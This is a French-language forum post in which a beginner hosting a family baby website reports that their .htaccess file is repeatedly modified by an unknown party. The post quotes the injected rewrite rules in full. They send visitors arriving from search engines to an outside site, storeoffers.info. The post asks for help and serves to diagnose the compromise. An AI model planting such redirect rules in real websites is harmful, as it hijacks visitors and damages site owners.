Coucou à tous. Je suis nouveau sur le forum et tout aussi nouveau en prog...
Dans le cadre de l'arrivée prochaine de mon premier bébé, j'ai décidé de mettre en place un site perso pour pouvoir partager avec toute ma famille et mes amis ce moment particulier de ma vie.
Etant client chez free, je n'ai donc pas cherché bien loin où faire héberger mon site...
J'avais dans l'idée d'utiliser une galerie photo nécessitant le passage en php5, du coup, j'ai suivi les conseils trouvés sur le net en créant à la racine un fichier .htaccess. Mais là, les choses se compliquent. Au départ, tout fonctionne parfaitement mais au bout de quelques temps (c'est variable, de quelques secondes a quelques heures), lorsque je tente de revenir sur mon site, plus rien ne marche (erreur 500). Je vais donc voir ce qui se passe sur mon site avec filezilla et je constate à chaque fois que mon .htaccess a été modifié (par qui, par quoi ???) sans que j'y touche. Au lieu de "php1" je me retrouve avec un truc de ce genre :
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://storeoffers.info/go.php [R,L]
Sachant que free ne sait pas gérer le rewrite, j'imagine que c'est ça qui fait planter mon site en me provoquant une jolie erreur 500...
Si quelqu'un pouvait m'aider à comprendre d'où viennent ces changements intempestifs et à les empecher ça serait formidable... Merci d'avance.
PS : j'éspère que ce sujet n'a pas déjà été traité dans un autre post, en tout cas je n'ai rien trouvé lors de mes recherches...
Message édité par Nive46 le 23-02-2010 à 00:19:06